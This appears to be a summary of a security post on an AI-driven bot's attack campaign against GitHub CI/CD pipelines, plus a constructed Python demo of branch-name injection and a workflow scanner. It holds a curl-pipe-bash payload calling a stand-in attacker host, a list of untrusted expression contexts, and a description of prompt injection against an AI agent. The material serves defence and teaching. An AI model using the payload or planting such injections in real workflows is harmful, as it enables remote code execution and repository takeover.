An autonomous AI-powered bot called hackerbot-claw ran a week-long attack campaign against the CI/CD pipelines of major open source projects on GitHub, targeting repositories from Microsoft, DataDog, the CNCF, Aqua Security, and others. It used five distinct exploitation techniques (pull_request_target "Pwn Requests", branch name injection, filename injection, direct script injection, and AI prompt injection) and achieved remote code execution in at least 5 of 7 targets. The most severe attack compromised aquasecurity/trivy: a PAT was stolen, the repository was fully taken over, years of releases were deleted, and a potentially malicious VSCode extension was pushed to a marketplace. Every attack carried the same curl-pipe-bash payload, which fetched and executed a script from an external C2 server. The only defense that fully held was Claude's built-in prompt injection detection, which stopped the prompt-injection attempt. The post details the mechanics of each attack, provides indicators of compromise, and recommends mitigations including network egress allowlisting, least-privilege token permissions, and static workflow analysis.
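As an added, constructed example (not code from the StepSecurity post, from hackerbot-claw, or from any of the targeted repositories), the Python below shows the mechanism shared by the branch name and filename injections and one form of the static workflow analysis the post recommends. A `${{ ... }}` expression inside a `run:` step is substituted textually by the runner before the shell parses the script, so a branch name containing a quote and a semicolon becomes shell syntax; the same value passed through `env:` stays data. The sample workflow, the branch-name payload, the `attacker.invalid` host and the `UNTRUSTED` context list are all made up for illustration, and the scanner is a deliberately small line-based checker rather than a full YAML parser.

```python
"""
Constructed example, not code from the StepSecurity post or from any of the
repositories it names. Demonstrates (1) why ${{ github.head_ref }} inside a
`run:` step is command injection and (2) a minimal static check that flags
that pattern, plus pull_request_target combined with a checkout of PR code.
"""
import re
from dataclasses import dataclass

# Expression contexts an outside contributor controls through a PR, issue or
# comment. Illustrative, not exhaustive. `steps.` is included because step
# outputs frequently carry changed-file names or commit text (filename injection).
UNTRUSTED = (
    "github.head_ref",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.pull_request.head.ref",
    "github.event.pull_request.head.repo.",
    "github.event.issue.title",
    "github.event.issue.body",
    "github.event.comment.body",
    "github.event.commits",
    "github.event.head_commit",
    "steps.",
)
EXPR = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")
RUN_KEY = re.compile(r"^(-\s+)?run:\s*(.*)$")
PR_HEAD_REF = re.compile(r"ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(sha|ref)")


def render(script: str, context: dict) -> str:
    """Mimic the runner: ${{ expr }} is replaced textually BEFORE the shell runs."""
    return EXPR.sub(lambda m: context.get(m.group(1), ""), script)


# Constructed attacker branch name: closes the quoted string, runs a command,
# then reopens a quote so the script still parses.
BRANCH_PAYLOAD = 'feat/x"; curl -s https://attacker.invalid/x.sh | bash; echo "'


def demo_branch_injection():
    """Return (rendered vulnerable script, rendered hardened script)."""
    ctx = {"github.head_ref": BRANCH_PAYLOAD}
    unsafe = render('echo "Building ${{ github.head_ref }}"', ctx)   # expression in run:
    safe = render('echo "Building $BRANCH"', ctx)                    # value passed via env:
    return unsafe, safe


@dataclass
class Finding:
    line: int
    kind: str   # "run-injection" or "pwn-request"
    expr: str


def scan(workflow: str) -> list:
    """Line-based check: untrusted expressions in run: scripts, and checkout of
    PR head code in a workflow triggered by pull_request_target."""
    findings = []
    pwn_trigger = "pull_request_target" in workflow   # crude trigger detection
    in_run, key_indent = False, -1
    for no, line in enumerate(workflow.splitlines(), 1):
        text = line.lstrip()
        indent = len(line) - len(text)
        if pwn_trigger and PR_HEAD_REF.search(text):
            findings.append(Finding(no, "pwn-request", text.split("#")[0].strip()))
        if not (in_run and (not text or indent > key_indent)):
            in_run = False
            m = RUN_KEY.match(text)
            if not m:
                continue
            key_indent = indent + (len(m.group(1)) if m.group(1) else 0)
            in_run = m.group(2) in ("", "|", ">", "|-", ">-", "|+", ">+")
        for expr in EXPR.findall(text):
            if expr.startswith(UNTRUSTED):
                findings.append(Finding(no, "run-injection", expr))
    return findings


# Constructed workflow: two unsafe steps, one Pwn Request checkout, one safe step.
SAMPLE_WORKFLOW = """\
name: pr-check
on: pull_request_target
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}   # PR code with write token
      - name: Announce branch
        run: echo "Building ${{ github.head_ref }}"
      - id: changed
        run: echo "files=$(git diff --name-only origin/main | xargs)" >> "$GITHUB_OUTPUT"
      - name: Lint changed files
        run: |
          for f in ${{ steps.changed.outputs.files }}; do
            lint "$f"
          done
      - name: Announce branch (safe)
        env:
          BRANCH: ${{ github.head_ref }}
        run: echo "Building $BRANCH"
"""

if __name__ == "__main__":
    unsafe, safe = demo_branch_injection()
    print("vulnerable step becomes:", unsafe)
    print("hardened step stays:    ", safe)
    for f in scan(SAMPLE_WORKFLOW):
        print(f"line {f.line}: {f.kind}: {f.expr}")
```

The rendered vulnerable step ends up as `echo "Building feat/x"; curl -s https://attacker.invalid/x.sh | bash; echo ""`, which is exactly the curl-pipe-bash shape the post describes; the hardened step is unchanged and `$BRANCH` is expanded by the shell as a plain string. The scanner reports the `pull_request_target` plus PR-head checkout on line 9 and the two `run:` injections on lines 11 and 16, and is silent on the `env:`-based step.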
Table of contents
What Happened
Attack 1: avelino/awesome-go - Token Theft via Poisoned Go Script
Attack 2: project-akri/akri - Direct Script Injection
Attack 3: microsoft/ai-discovery-agent - Branch Name Injection
Attack 4: DataDog/datadog-iac-scanner - Filename Injection
Attack 5: ambient-code/platform - AI Prompt Injection
Attack 6: aquasecurity/trivy - Evidence Cleared
Attack 7: RustPython/RustPython - Branch Name Injection with Base64 Payload
Indicators of Compromise
Summary of Results
How StepSecurity Can Help
Acknowledgements
Timeline